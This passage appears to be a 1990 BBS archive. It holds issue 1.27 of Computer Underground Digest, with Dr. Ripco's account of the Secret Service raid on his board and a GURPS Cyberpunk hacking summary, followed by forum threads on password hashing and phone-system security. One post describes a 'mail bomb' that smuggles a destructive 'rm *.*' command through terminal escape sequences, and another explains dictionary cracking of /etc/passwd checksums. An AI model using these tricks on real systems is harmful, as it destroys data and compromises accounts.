views of the moderators. Contributors assume all responsibility
for assuring that articles submitted do not violate copyright
protections.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
CONTENTS:
File 1: Moderators' Corner
File 2: From the Mailbag (Response to Neidorf article)
File 3: Dr. Ripco Speaks Out
File 4: SJG Gurps Cyberpunk
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
----------------------------------------------------------------------
********************************************************************
*** CuD #1.27, File 1 of 4: Moderators' Comments ***
********************************************************************
Date: 9 August, 1990
From: Moderators
Subject: Moderators' Corner
++++++++++
In this file:
1) TAP Address
2) Berserker BBS update
3) Len Rose Update
+++++++++++++++++++++++++++++
TAP ADDRESS
+++++++++++++++++++++++++++++
The TAP article in CuD 1.26 did not include an address. For those wishing
to subscribe, the address is:
TAP
PO Box 20264
Louisville, KY 40250
+++++++++++++++++++++
Berserker BBS Update
+++++++++++++++++++++
In a recent issue of CuD, we inquired about the status of Berserker BBS. We
are informed that Berserker still operates, but the number was changed.
Good news for Berserker fans.
+++++++++++++++++
Len Rose Update
+++++++++++++++++
We talked with Len Rose last night, and he indicates that his trial,
scheduled for this month, will most likely be delayed until February, 1991.
The counts against him resemble those of Craig Neidorf and the "Atlanta 3."
We will provide a detailed summary of our conversation as well as a copy of
the indictment in CuD 1.28 on Monday.
********************************************************************
>> END OF THIS FILE <<
***************************************************************************
------------------------------
Date: 9 August, 1990
From: Moderators
Subject: From the Mailbag (Response to Neidorf article)
********************************************************************
*** CuD #1.27: File 2 of 4: From the Mailbag ***
********************************************************************
Date: Thu, 9 Aug 90 10:01:01 -0500
From: Michael J. Hennebry <hennebry@plains.NoDak.edu>
Subject: Re: NEIDORF TRIAL OVER! GOVERNMENT DROPS ALL CHARGES!
In article <10181@accuvax.nwu.edu> TK0JUT2%NIU.BITNET@uicvm.uic.edu writes:
>Neidorf. Defense Attorney Sheldon Zenner said that Prosecutor Bill
>Cook's decision was "in line with the highest standards of good
>government and ethical conduct." ..
The highest standard of good government and ethical conduct would not have
allowed prosecution in the first place. If ethics had anything to do with
the dismissal the other defendants would have had their "convictions"
reversed.
>.. Zenner said that the government could
>have continued to the last and let the jury decide, but did the
>honorable thing.
Dropping charges is not the same as acquittal. Perhaps Cook is going to
try again and will keep prosecuting and dropping charges until Neidorf
runs out of money to defend himself.
>Craig Neidorf was ecstatic about the decision, and feels vindicated.
>He can now resume his studies, complete his degree, and seriously
>consider law school. He *WILL NOT* resume publication of PHRACK!
No doubt killing PHRACK was one of the prosecution's goals.
>Zenner praised Bill Cook's decision to drop all charges, and added he
>is not angry, but appreciative. Zenner also felt that the the efforts
Zenner isn't Neidorf. Zenner isn't suffering from the effect of the
prosecution.
>There are those who have taken the Ed Meese line ..
I'm one of them.
>..and assumed that
>Craig must have done *something* or the government wouldn't be
>prosecuting him. ..
I'm not one of them. What Meese said was that one who is not guilty is not
a suspect. This is true. Neidorf is not guilty, therefore Neidorf was not a
suspect, therefore Cook had no right to prosecute him, therefore Cook
should be in prison for kidnapping. At the sentencing Neidorf should get
to remind the judge that to commit his crime Cook used a deadly weapon, the
federal criminal "justice" system.
>it was claimed, couldn't respond because it had to protect Craig's
>privacy and was required to sit in silence. One prosecutor even said
Has government refusal to respond to defense supporters' questions
about a prosecution *ever* been to the advantage of a defendant?
>There is little cause for Craig's supporters to gloat, because the
>emotional and financial toll on Craig and his family were substantial.
That was part of the purpose of the prosecution.
>Now, however, it is time to move on and address the lessons learned
>from the experience. Some of the issues include how computerists can
>be protected from overzealousness, ..
They can't be protected. Nobody has any protection from overzealous or evil
prosecutors. It's called prosecutorial immunity. Until we get rid of it we
are at the mercy of folks like Cook, but prosecutorial immunity is forever.
Neidorf won't get paid for what Cook has cost him. The only people
involved in a persecution who get paid anything significant are those who
participate voluntarily, and not all of them.
********************************************************************
>> END OF THIS FILE <<
***************************************************************************
hackers.53dejanr,
[...nastavak]
------------------------------
Date: 7 August, 1990
From: . Ripco (Bruce ?)
Subject: Dr. Ripco Speaks Out
********************************************************************
*** CuD #1.27: File 3 of 4: Dr. Ripco Speaks out ***
********************************************************************
This document is being written to state my involvement with Operation
Sundevil and the events that passed on May 8th of 1990. My name is Bruce
Esquibel but most people in the modem world would know me better as Dr.
Ripco, the sysop of the Ripco Bulletin Board in Chicago.
Ripco operated since the winter of 1983 and preformed what I believe to be
a good public service to the telecommunications world. Its label as a
'phreak and hacker' board was an incorrect statement which I lived with
most of the time. Some content of the system was in fact dealing with that
subject but I have always felt most of the information especially in the
form of general files was nothing more than second hand news, traveling
board to board. Neither the board or myself ever supported or was
associated with formed hacker groups like the LOD or TKOS. In the years
Ripco operated there were members from these groups at one time or another
but only to establish accounts and rarely touched base or communicated with
other users.
The system was quite popular with it peaking at 701 users and averaging
around 600 active at any one time. Daily it took in about 50 calls with
this figure waxing and waning with the social seasonal changes of school
schedules and holidays. The majority enjoyed the freedom of expression the
system provided, not to figure out how to make a free phone call. Most of
the activity was on the main message board which could be accessed by
anyone, even those without validated accounts. The rest of the message
bases Ripco had were more specialized in their subject matter but not too
much more than what is found on other boards. Ripco's greatest claim to
fame in my opinion was the general files. It seemed to attract new users
like flies to honey. I don't think the reason for this was quality but in
fact quantity. There was over 2500 of them, divided into 23 sections. Like
the message bases only a minority of the files could be put into the
hack/phreak class.
Ripco operated with a bit of mystery to it. My personal involvement on the
board was next to nill. Unlike other operators who rule their boards like a
god, I decided long ago to let the people do what they wanted without
getting in the way and give them the freedom to stand on their own two
feet. This didn't mean the system was total anarchy, in fact many
complimented on how well the system was structured. This unusual concept
let some to believe the whole system was a setup and I was accused on
several occasions of being a FBI sting board or associated with some kind
of law enforcement. Adding to this was some argument over where the bbs
was actually located. A few adventurous individuals attempted to track it
down through the CNA bureau and ended up at a vacant storefront. The real
explanation is a long story but it comes down to multiple screw-ups by
Illinois Bell more than any deceptive practices on my part. This of course
doesn't happen in real life thus the only people that can get a phone
number for a fictitious address are 'feds'.
At least now I can put that rumor to rest. On May 8th I was awakened at my
home at 6:30a m by several Secret Service agents with a warrant for
computers and telecommunications equipment. They also had a second warrant
issued to the address where Ripco operated out of. Although there are
better ways to start the day, this did not come as a real surprise to me.
Since 1987 when Shadow Hawk made the papers with his $2.3 million software
theft charges it occured to me that as more and more people are caught, if
they even were remotly connected to Ripco, eventually something would turn
up on my end. This could be considered the reasoning of a mad man but I
have always felt that there was no illegal activity going on within the
system and could defend it no matter how petty it was taken apart. To put
it another way, Ripco's bark had a hell of a reputation but no bite.
This was probably and still is true depending how you look at it. The
warrants issued were only (!?!) seizure warrants issued to the addresses.
There were no names on them and I was not arrested or charged by the Secret
Service. This provided me some relief but since I didn't get to sleep till
4am that morning it was probably a lack of reasoning on my part.
There were at least 5 agents that came to the house, but I think they had a
few more around back in case of an escape attempt. Three of them stayed
while two others drove me to the other location. The only question they
asked before I left was it would be easier if I gave the location of any
computers I had there to which the reply was 'none.' This later proved true
since no items were taken, but they did spend about an hour looking through
everything.
I wish to point out that this was not a scene that would make good
television. They didn't break down any doors, no one I observed had a gun
drawn and overall they were pleasant in their mannerisms. This is not being
said in defense of them but I always have been curious about the stories
passed around where swat teams come down on a 16 year old for running a few
MCI numbers. One interesting side note to you electronic phreaks out there
is their radios, which probably use Motorolas digital voice protection
circuitry trip every car alarm in the neighborhood when keyed. Several of
the agents said this was normal and wished they didn't have this side
effect.
As I traveled with the agents to the other location I started to think what
they were about to see and if anything was there that needed a fast
explanation. The only thing that occured to me was three handguns I kept
for personal protection. I informed the driver of this fact and he radioed
ahead to let them know. He said matters like that isn't their concern but
added they have to check with local law enforcement to see if I was in
violation of city or state laws.
When we arrived there was a sizable crowd waiting. Besides 5 or 6 more SS
agents, there were a few others in suit and tie (the SS dresses casual) and
at least one Chicago police car with a couple officers. The agents that
escorted me there led me to a woman probably in her mid or late 20's. She
apparently was the one in charge and gave me instructions on how we were
going to enter the building. Before unlocking the front door she asked
several times if any boobytraps were set either for them or the computers.
I found this questioning amusing but was the only one smiling of the group.
Unlocking the front door led to questions about where the guns were located
and instructions on how to find them. I brought up the fact the alarm
system had to be turned off and after a few attempts she managed to
deactivate it. A different agent was sent in and recovered the weapons.
As we entered the main room I was told not to touch anything but to point
out the computer the board was run off of, which I did. The woman then
introduced herself as Barbara and informed me of what I already knew, they
were there to carry out a warrant and that it would probably take a while.
She handed me a piece of paper which was the actual warrant and as I looked
it over, a paragraph stated it was issued based on an attached affidavit,
specifically pages 26-39 by a special agent Lawson. Asking where the
attached affidavit was brought the reply "it was a closed document, I
didn't have any rights to see it" and added 'its an on-going
investigation'. I was then informed by her that I was not under arrest nor
charged but they had to read the Miranda rights to me since any questions I
answered could be used against me. Another agent said they did have
questions but I did not have to answer them, could answer them with a
lawyer present or even have a lawyer present and not answer them. He also
pointed out that I could stop answering the questions at any time so I
figured I'd agree to answer them since there wasn't all that much to hide
anyway.
Although an attempt was made to get comfortable within the building, the
main area is full of junk collected over the years and the limited seating
made things a bit crowded. We eventually ended up out back outside where
the questioning took place. From this point on Barbara made few other
comments and the bulk of the questions were handled by another young agent
named Tim.
The questions started with an apology by Tim saying there was someone who
requested specific questions to be asked for a case study or something
along those lines. He said they were fairly simple but was required to ask
them. These questions were general in nature and read off a xerox sheet,
mostly a list of phrases that were looking for definitions. What is a
phreaker, hacker, know what a virus is, have you ever written or
distributed one, etc.
After this opening round of Q & A, he announced we were going on to more
specific questions involving myself and the bulletin board. I don't really
remember most of the questions but the subject dealt with my awareness that
both credit card and long distance access codes were being passed through
the system and what was on the hidden boards that normally wasn't part of
standard access, and who had access to them. My answer to these led into
the system maintenance and how I handled it.
As far as the question about the codes went, I replied no I was not aware
of that and he point out they had printouts proving they were. Of course it
crossed my mind that if they already had soild proof, why bother to ask the
questions. I wish to publicly state that this type of information was
posted from time to time but I did not lie to the question. Regular users
of the board were aware that long ago I made clear the system policy on
this matter. Long distance codes along with credit card information was not
allowed to exist on the system. I felt that any specific information left
that could lead to direct fraud was not welcome and would be removed and
persons who repeated violating this themselves would be removed from the
system also.
To clarify the phrase 'specific information' to the readers of this file I
wish to explain my position on how I considered board policy on messages.
It is no secret that many of the posts of board 5 (fone phun) either
solicited for the need of or said they had and would share such
information. I never considered this wrongful for a number of reasons. The
primary one would be most people on there were blowing smoke as far as
really knowing anything either fraudulent or important. Few people outside
the bbs community realize that in many areas both status and ego are
wrongfully important factors to others within the modem society. Many
people who wish to raise their status will often come up with outlandish
claims in an attempt to convince others he or she is an expert on one
matter or another.
Any attempt to suppress this act I felt would of damaged Ripco's open door
policy since people do have to start somewhere and eventually learn their
peers will catch on fast if someone is pulling a bluff. Thus this type of
activity was tolerated but the line was crossed if anyone attempted to
really do it. For example if a message contained something like 'just dial
1-800-555-1212 and punch in 123456 at the tone', the entire message was
removed or in more cases re-edited especially if other parts were about
non-related matters.
Returning to the questioning, the above was explained as such but not as a
whole. If in fact they did have printouts of such activity, I suggested an
explanation which covered the maintenance aspect of the board. Basically
Ripco operated itself with my chores limited to validating new users and
updating the general files. Once every morning the messages left since my
last check-in were read. The removal/re-edit if needed was applied at this
time. Considering this occured daily around noon, a message posted let's
say at 3:00pm the preceding day was in existence for nearly 21 hours
before it got my approval or disapproval. Thus I pointed out that in theory
they could have a printout of something but if checked the following day,
it should have been removed.
This was not second questioned by them and they seemed content with it. As
far as the hidden boards went, there were two as most of the system users
knew but were not really active. Board 9 to the best memory serves me was
completely non-existant. Although it was used in the past for various
things, after one of many hard drives crashes it bit the big one and was
not in service. The message file required to use it was not there and I
believe there was even a line in the program that reset the security bit of
people that did have access in the past so they couldn't accidently enter
causing a 'file not found' error. Board 10 was active but fewer than 6
people could claim to access it. Originally it was set up when an attempt
was made on my part to collect a few bucks to keep the system running back
in 1985. It contained few messages and would only gain 5 or 6 more a year.
Questioning from this point on was more broad in nature, jumping from
subject to subject. Items like the anarchy files which were made up in part
of bomb construction articles were deemed 'wrong' by them and I defended by
saying such information could be gathered from numerous public sources.
They still insisted it was 'wrong' and shouldn't have been made available.
One fact that arose well into our chat is that it became obvious that
besides Tim who seemed to know little besides a few buzzwords, none of
those here really had an understanding of computers or much else as far as
a technical background went. Another agent even admitted later that they
were only here to serve the warrant, as far as what was really going on
with the investigation and who or what was involved, they didn't know. Any
questions I attempted to ask them were generally not answered and the
ultimate question of 'why me?' was given the reply 'catch the evening news,
this is happening right now all over the country, should make some good
headlines.'
Even the simple question of what's next, where does the stuff end up needed
a short conference among them and they decided on the following: after its
boxed up downtown, it's shipped to Washington to a department called
'diagnostics'. Tim appeared to be the only one with knowledge of this
because one of the other agents asked him 'who runs that?'. Tim explained
to him that it was part of the SS and was started a couple years ago. The
other agent just shrugged his shoulders.
To put some people fears to rest, there wasn't much else going on. I
expected they were going to ask me about certain individuals or if I knew
anything else going on, but they didn't. Even subjects like PHRACK and the
LOD were only touched upon, no specific questions were asked or answered.
They seemed pleased to find a catalog printout of the general file section
with the PHRACK issues but considering anyone with a valid account had
access to the actual files, this didn't seem to make sense to me.
After a couple hours of this with many lulls in the questioning they asked
if I would sign a statement saying basically everything I said was true and
I did because it was. The only other thing they wanted in the statement was
that I was in fact the operator and did make an attempt to keep the board
clean on a daily basis. Makes me wonder now what that could be twisted into
later down the line.
In all they were here for about 6 hours. In that time I learned little on
what was going on. One of the agents said there were 2 representatives from
AT&T present but didn't know why, saying they just had instructions to pick
them up this morning before they came and got me. My gut feeling was the
code/credit card numbers that much of the conversation was based on.
Drawing to the end they informed me the warrant was completed, led me back
inside after taking a few snapshots of your truly and handed me a receipt
of what they took. Annoying in the first place them being there, the first
thing that caught my eye was both my personal Macintoshes were on the list
along with the related hardware including a 940 meg worm drive and laser
printer. Laser printer? Maybe if you could pick it up and throw it at
someone it could be considered a lethal weapon but what else? Ripco
operated on an Apple //e and had no connections to the macs besides being
near them which apparently is the way they determined what stayed and what
went.
My guess is that after examining the rats nest of wiring that existed around
the 3 computers, they figured anything plugged into the power strip must have
been tied in with each other somehow. An IBM 386 clone and an Apple //gs
sat on the floor only a couple feet away but were untouched. Other
items taken included a 1955 Western Electric model D500 phone, any personal
phone books including a copy of the Chicago White Pages and several
pictures and cartoons I had hanging on the wall. This also included a
picture of a hooker spread eagle from a bachelor party and a picture of
Charles Manson clipped from some tabloid because it bore a resemblance to
me. All disks if not in a sealed box (probably around 3000) were also
taken along with paperwork found in various areas. These items were only
listed as 'misc.' and not broken down on the receipt.
I was cut loose only momentarily since an officer from the Chicago Police
Department replaced the many people running in and out during the morning
hours. He asked if the guns turned over to him were registered with the
city, which they weren't because you can't, so I was charged with a
misdemeanor, failure to register a firearm. A slight explanation about
this: back when Jane Byrne was mayor, she wanted to outlaw handguns
altogether. Some suburbs of Chicago tried this and met with resistance from
the NRA and feared long court battles. So they offered an a grace period
to get people who already had them to register them, but at a cut off date,
handguns could no longer be registered. Thus anyone getting caught with a
handgun after this did not face an illegal weapons charge, only the failure
to register even though someone who registered prior is safe. It ends up
going to court, having the weapons destroyed and getting 6 months
supervision with no conviction on the books. This was the outcome of that
situation.
At least that story had an ending. As far as what is going between me
and the Secret Service, I don't really know or have a clue. At this writing
it has been nearly 3 months and I haven't heard a word from them. Everything
is just speculation on my part since it seems the matter is being kept
under wraps. Even the names of the others involved on that day were not
released. I don't know if those other people were system operators or
users. One agent said you'll probably hear from us in 6-8 months while
another was not so optimistic and said it would probably take years adding
later that it's a good chance I'll be in my 50's, married with children
before I knew what happened.
In the time shortly after the seizure I talked to several lawyers to at
least get some opinions on what to do next. Without being charged it seems
very little can be done. My only options are 1) sit back and relax, wait
till they do something or 2) file a lawsuit to get the stuff back. All the
attorneys brought up the suit idea but only one suggested it wasn't really
a good way to go. Based on what they took as far as value goes, the
preliminary costs would be about half with it approaching double if it has
to go to court and heard in front of a jury. It appears the best outcome is
to get the stuff back, you can't claim damages or get your court fees back
when it comes to the federal government.
One point I want to make clear is under a seizure warrant, all material
taken is forfeited to the government. It doesn't seem like a situation
where they have to give it back after examination. They have according to
what little I could find on the subject, 5 years from the date of the
warrant to set up an indictment. Even if no indictment is made, they don't
necessarily have to return it. It can either be used for internal use or
put up at auction. There was an article in Unix Today where an agent seemed
to indicate the material is returned but I haven't found any support of
this policy.
My opinion on all of this is basic. The government came in, took my
personal property to determine if there was any wrong doing somewhere. It
seems like a case of being guilty and proving yourself innocent. Or in
another light, them thinking there was wrong doing and getting the stuff to
make sure. Either way its just not right. Although I have no desire to
battle this in court on my own, it seems to be there should have been a
charge for something, even if it was minor, with other stuff being added
later if needed. At least it would beat this nazi/gestapo tactic of
secrecy.
Is Ripco's involvement with credit cards and access codes the real basis?
Does the distribution of PHRACK play a part in it? What if they were
investigating someone on the board and felt there was information that
would help them? Did they ever think of knocking on the door first? If it
was someone else they were after, should I be the one getting penalized?
Does the first amendment come into play at all? Even though I am free to
open another board at this time if I choose, why isn't a newspapers
printing press taken when a reporter refuses to name his sources about a
sensitive story?
I don't have the answer to any of these questions. Even if I did, they
might be the wrong questions in the first place. One opinion put forth by
several people is that putting the board out of business could be all they
wanted. Its possible if any one piece of information contained within
Ripco was used in assisting someone to commit a crime, it could be all they
needed. Maybe they looked at Ripco as a pain in the ass since the beginning
but couldn't get rid of it any other way.
In closing I'd like to point out that this is not a black and white issue
reguardless of anyone's opinion. There were many who hated the board,
thought it was trash and would of liked to see it removed for good. Well
they got their wish but consider the circumstances of what happened. No
reason given, none to offer. Think about that next time you sign on to your
favorite system and see a message about someone selling a used computer or
hard drive. If that item is by chance stolen merchandise, can the operator
lose his computer because it aided someone to fence?
Based on what happened to me up to this point, its only one step away. I am
not a hacker, phreaker, have anything to do with credit cards or
manufactured explosives. Until the weapons charge I never had been arrested
and even my driving record has been clean since 1978.
1984 arrived a bit late but there is no doubt to me its here. Thanks again
to everyone that supported the board and there is always the possibility
another Ripco will appear.
You just never know.
********************************************************************
>> END OF THIS FILE <<
***************************************************************************
------------------------------
Date: Sat, 4 Aug 90 17:08:34 CDT
From: "J. Eric Townsend" <jet@karazm.math.uh.edu>
Subject: SJG Gurps Cyberpunk
********************************************************************
*** CuD #1.27: File 4 of 4: Another Gurps Review ***
********************************************************************
Here is a text file I wrote when SJG Gurps Cyberpunk was first released.
Well, I rushed out and bought GURPS Cyberpunk, in the hopes that my money
will help SJG with legal fees. (Plus, I collect game stuff.)
On the front cover, in the SJG Illuminatus logo, it says: "The book that
was seized by the U.S. Secret Service! (see p. 4)"
Anyway... (Assuming I know *nothing* about cracking/phreaking. I won't
comment on my real knowledge.) The following is a summary of text from the
GURPS Cyberpunk supplement, with a few direct quotes.
How Much Hacking Can I Do Based on the C-word manual: (From the section
entitled "Netrunning".)
0. People use handles to hide their real identity (p62).
1. You can use sensitive devices to listen in on the signals being sent to
a computer monitor, and redisplay the image on your own screen (p62).
2. General info on ISDN. (p64-65)
3. Computer accounts can come in various levels, from specialty logins
(uucp) to "superuser" who has access to everything. Some programs can give
you a higher level of access, equivalent to a "better" account (p68).
4. General info on back doors (p69).
5. General info on chat systems (p69).
6. A list of network names from around the world. No clues as to which
are real. For the US, the following are listed: WUT, UDTS 2, Datel I &
II, Telenet, Tymnet, ARPAnet, Infomaster, GraphNet, TRT, FTCC, UniNet,
Autonet, CompuServe, GENIE, AlaskaNet, JANET, Internet (p 71).
7. Passwords can be really obvious, or hard to remember random text
strings (p 72).
8. A program could possibly cause physical damage (p 72).
9. General Phreaking Info:
- Diverters: go through a bunch of systems so that tracing takes
a long time;
- Junction Boxing: Just go down to the local junction box and tie in
(p 76).
10. Lots of networks use different protocols that are sometimes
incompatible (p 77).
11. Ma Bell stuff:
- Existence of CN/A, and that Ma Bell can look you up in any way;
- Line Routing: "With access to the main phone switch computer,
a hacker can control everything about a specific phone line.";
- Monitoring: a person could monitor calls with the right access;
- After Billing: A person could change bills;
(p 82).
12. Trashing: Go through somebody's trash to find out all sorts of
interesting info about their computing equipment (p 86,87).
(13 and 14 are from the section "Attack and Defense Programs". The
programs are obviously s-f software, but...):
13. Promote: "This program is executed from a normal user account on a
system. If successful, the account is 'upgraded' to a superuser account."
14. Webster: "This is the standard icebreaker for use against Password
programs (see p 93.). It acts as an extremely fast 'brute-force' hacker."
(p 92).
15. Credcard Crime: A false balance could be entered in an account. A
device could be used to access somebody else's card without having the
correct password to get into the credcard (p 105). [note: a credcard is a
self-contained debit card that can have anything from a password to retina
scan protection.]
And, um, that's about it. Now that you've read that, you know how to break
into computer systems and do phone phreaking... 1/2 :-)
--J. Eric Townsend -- University of Houston Dept. of Mathematics
(713) 749-2120
********************************************************************
------------------------------
**END OF CuD #1.27**
********************************************************************
hackers.54aleks,
Hm, mislio sam na ono sto sam procitao u Data Communications i sto
vazi za USA : oni imaju problema sa nekim gotovim paketima BBS-a i
kazu da je moguce dok se neki korisnik na izgled normalno "seta" po
BBS-u prokrijumcari se njegov program koji "skine" sifre za
privilegije i "preda" mu ih pri sledecem javljanju. Kako ovo radi
nemam blage predstave ali radi, tj. ljudi se zale.
Jos nesto osim virusa, ovakvih trojanskih konja i sl. muce ih
takozvane "mail bomb" narocito na UNIX mrezama - posto vecina
terminala poseduje escape sekvencu da vrati sistemu naredbu koja se
pojavi na ekranu u privatnu postu se ubacuje poruka na primer "rm
*.*" koja se zavrsava ovom sekvencom, to se vrati sistemu ... i eto
stete . Nartavno ovo ne radi ako je terminal drugog tipa (na primer
VT -100 i 3270 se naravno nikako ne slazu) . Da li je nesto ovako
moguce na PC-u ili PC terminalu sa ANSI Esc. sekvencama???
hackers.55dejanr,
Poruka sam premestio iz SEZAM/primedbe...
>> kazu da je moguce dok se neki korisnik na izgled normalno "seta" po
>> BBS-u prokrijumcari se njegov program koji "skine" sifre za
>> privilegije i "preda" mu ih pri sledecem javljanju. Kako ovo radi
>> nemam blage predstave ali radi, tj. ljudi se zale.
Pa, recimo zadaš download *.* i Sezam ti da kompletan softver ;)
Naravno, od toga smo se obezbedili ali da nismo... bilo bi problema!
Jedino je sreća što passwordi korisnika nigde na Sezamu nisu zapisani
(koga interesuje kako je to moguće (ako svi već ne znaju) neka pita).
Pozdrav,
Dejan
hackers.56dpozaric,
******************
Jedino je sreca sto passwordi korisnika nigde na Sezamu nisu zapisani
(koga interesuje kako je to moguce (ako svi vec ne znaju) neka pita).
******************
Kodirano ? Nedostupni drive ? Nista trece mi ne pada na pamet...
Ah, da... Boot ROM ? Ma, kako u njega upisati nove passworde ? Negdje
svakako moraju biti pohranjeni...
hackers.57dejanr,
>> Negdje svakako moraju biti pohranjeni...
Pa, i da i ne. Zamisli da se umesto passworda čuva samo njegov
checksum. Iz passworda koji korisnik otkuca se uvek može naći
checksum pa uporediti, ali se iz checksuma ne može rekonstruisati
password.
Checksum bi bio nedovoljno bezbedan ali uz malo bolji algoritam
(kakav recimo ovde imamo)...
Inače, sličan metod je zastupljen na Unixu, VMS-u itd - upravnik
sistema može *promeniti* nečiji password ali ga *niko* ne može
saznati.
hackers.58kale,
>> Negdje svakako moraju biti pohranjeni...
Ne moraju. Kada se proverava korisnikova lozinka program nekakvom
transformacijom od nje napravi broj pa taj broj uporedi sa onim
zapamćenim. Na osnovu tog broja se u opštem slučaju ne može odrediti
password.
Ovaj sistem zaštite je uobičajena stvar.
hackers.59bojt,
>> Inače, sličan metod je zastupljen na Unixu, VMS-u itd -
>> upravnik sistema može *promeniti* nečiji password ali ga *niko*
>> ne može saznati.
Znači, ko zna algoritam i pokupi Checksume veliki je čovo...
hackers.60dejanr,
>> > Inače, sličan metod je zastupljen na Unixu, VMS-u itd -
>> > upravnik sistema može *promeniti* nečiji password ali ga *niko*
>> > ne može saznati.
>>
>> Znači, ko zna algoritam i pokupi Checksume veliki je čovo...
Pa, recimo na Unix-u svi znaju algoritam i svi mogu da pokupe
checksume koji su u etc/passwd. Al šta im vredi kad se checksum
ne može "vratiti" u password?
Na VMS-u su ipak uveli dodatnu meru da ne može niko neprivilegovan
ni pokupiti čeksume.
hackers.61dpozaric,
*********************
>> Negdje svakako moraju biti pohranjeni...
Pa, i da i ne. Zamisli da se umesto passworda cuva samo njegov
checksum. Iz passworda koji korisnik otkuca se uvek moze naci
*********************
Jes', vala, pade mi na pamet i nesto takvo. Nije mi dala mira
cinjenica da nisu nigdje pohranjeni (kako si najprije rekao), i to me
natjeralo da zaista razmislim dok sam se vozio prema baki koju sam
jucer isao posjetiti.
Onda sam rekao sam sebi da je to apsolutno nemoguce i da negdje
moraju biti prisutni, samo vjerojatno ne u ASCII ili nekom drugom
"readable" formatu.
Ona mi je, naravno, pao napamet checksum, jer sam ga i ja bio
koristio (iako rijetko, jer nema potrebe u mom poslu).
Vrlo zgodno, pogotovo sto nema teorije da netko povrati iz checksuma
password bez algoritma. Jedino bi masina sama mogla naci algoritam
kad bi nekome dali njegov checksum. Jer, masina je stvar koja moze
unedogled vrtjeti kombinacije, samo ako ima dobar programcic. No,
sumnjam da bi netko imao od toga koristi.
Pozdrav,
Drazen.
hackers.62dpozaric,
****************
Ne moraju. Kada se proverava korisnikova lozinka program nekakvom
transformacijom od nje napravi broj pa taj broj uporedi sa onim
zapamcenim. Na osnovu tog broja se u opstem slucaju ne moze odrediti
password.
Ovaj sistem zastite je uobicajena stvar.
****************
Ne moraju, dakako, u izvornom obliku. Ali, ja sam se malo prebukvalno
drzao Dejanove izjave da ih nema nigdje na Sezamu pa otud i moja
reakcija.
Pozdrav,
Drazen.
hackers.63kale,
>> Jedino bi masina sama mogla naci algoritam kad bi nekome dali njegov
>> checksum. Jer, masina je stvar koja moze unedogled vrtjeti
>> kombinacije, samo ako ima dobar programcic.
Na VAX-u je taj checksum dug 4 bajta - dakle preko 4 milijarde
mogućih vrednosti. Da stvar bude još teža za provaljivanje, checksum se
ne pravi samo od password-a, već i od username-a zajedno sa njim.
hackers.64dejanr,
>> Vrlo zgodno, pogotovo sto nema teorije da netko povrati iz checksuma
>> password bez algoritma. Jedino bi masina sama mogla naci algoritam
>> kad bi nekome dali njegov checksum. Jer, masina je stvar koja moze
>> unedogled vrtjeti kombinacije, samo ako ima dobar programcic. No,
>> sumnjam da bi netko imao od toga koristi.
Naravno, iz checksuma je *nemoguće* povratiti password pošto, primera
radi, ima 26^8=2*10^27 passworda (ako uzmeš da je ograničen na 8 slova)
i svega 2^32=4*10^9 32-bitnih passworda - dakle podosta raznih
passworda otključava istu bravu. Međutim, ljudi (tj. hakeri :) ) se
dosetili da uzmu neki rečnig iz spelling checker-a, da za svaku reč
iz njega naprave checksum i onda samo indeksiraju koristeći ono
što pročitaju iz /etc/passwd.
Nauk - ne koristite neku smislenu reč za password.
Srećna okolnost - naš rečnik još niko nema u kompjuteru :(
hackers.65dejanr,
>> Na VAX-u je taj checksum dug 4 bajta - dakle preko 4 milijarde
>> mogućih vrednosti. Da stvar bude još teža za provaljivanje,
>> checksum se ne pravi samo od password-a, već i od username-a
>> zajedno sa njim.
Mislim da je tako bilo na VMS-u 3.XX. Posle su dodali još 4
bajta, kol'ko da se nađe ;)
hackers.66dejanr,
==========================
security/main #824, from bkep, 327 chars, Fri Oct 5 20:14:00 1990
There is/are comment(s) on this message.
--------------------------
A few weeks ago "The Wall Street Journal" ran an article suggesting that
hackers have become a serious threat to the phone system. Now, newspapers
being what they are I realize that you cannot always take what's printed
as gospel. That's why I'm asking. Does anyone think hackers are capable
of disrupting the phone system?
==========================
security/main #825, from srfleming, 1313 chars, Fri Oct 5 21:57:21 1990
This is a comment to message 824.
There is/are comment(s) on this message.
There are additional comments to message 824.
--------------------------
> Does anyone think hackers are capable
> of disrupting the phone system?
I work in this field... so a lot of what I know, I can't say, and
I WOULDN'T say a lot of it in a public forum anyway.
Facts that are in the public domain prove beyond a shadow of a
doubt that not only CAN hackers disrupt telephone service, they
HAVE.
Facts that are not in the public domain are even more chilling.
The public switched network is terrifyingly vulnerable at all
levels -- from hackers, from disgruntled employees, or from a
terrorist with a hand grenade.
But help is on the way. Long-line deregulation (giving birth to
MCI and Sprint, et al) has greatly improved the survivability of
long-distance communications. Cellular service has provided an
alternative to vulnerable land lines in a number of disasters
(earthquake, fire, etc.). In the next decade, personal
communication networks (handheld telephones competing with
wireline) will provide a bypass option for individual residences.
Motorola is talking about handset-to-satellite bypass. And so
forth.
So -- while any particular element of telecom service is
vulnerable to being knocked out by a hacker or other malicious
intruder, it is becoming less and less likely that -all- service
could be knocked out simultaneously by anything less than total
war.
==========================
security/main #827, from jcates, 111 chars, Fri Oct 5 23:30:56 1990
This is a comment to message 824.
There are additional comments to message 824.
--------------------------
Yes. Any system using computers, relying on them, is highly
vulnerable to infiltration and debilitation.
Jim
==========================
security/main #828, from jcates, 287 chars, Fri Oct 5 23:34:10 1990
This is a comment to message 825.
There is/are comment(s) on this message.
There are additional comments to message 825.
--------------------------
Silly thought. As that move is made, computer communications
will follow it and use the same paths! There is no difference.
As long as the computer has access to the lines, it can infil-
trate the computers controlling those lines, as they are,
invariably, also on the same lines.
Jim
==========================
security/main #830, from yllar.17, 357 chars, Sat Oct 6 03:03:35 1990
This is a comment to message 825.
--------------------------
i doubt that a hacker would knock out the system, but do
something they considered funny, is a very likely possibility
car phones are also easy to attack (another tech file),
i don't know from experience, only from what ive read
and saw, but if i was the telco company, i would indeed
worry, and do my best to make the system much
more secure...
==========================
security/main #831, from yllar.17, 538 chars, Sat Oct 6 03:06:39 1990
This is a comment to message 828.
There is/are comment(s) on this message.
--------------------------
as one who has been there, i can say that there are enought
ways to 'screw over ma bell' to fill a large manual, everything
from just plainly turning off a service or so, to getting
calls free, or whatever..ive got several enemies that ive
been worrying about ever since my arrest...some of these people
do have the knowledge to really do damage, that is one
reason, it's not that safe to give out a real phone number
or address on some bbs's..you never know who might decide to
have a little fun with you...it's happened...
==========================
security/main #833, from roedy, 222 chars, Sat Oct 6 14:22:09 1990
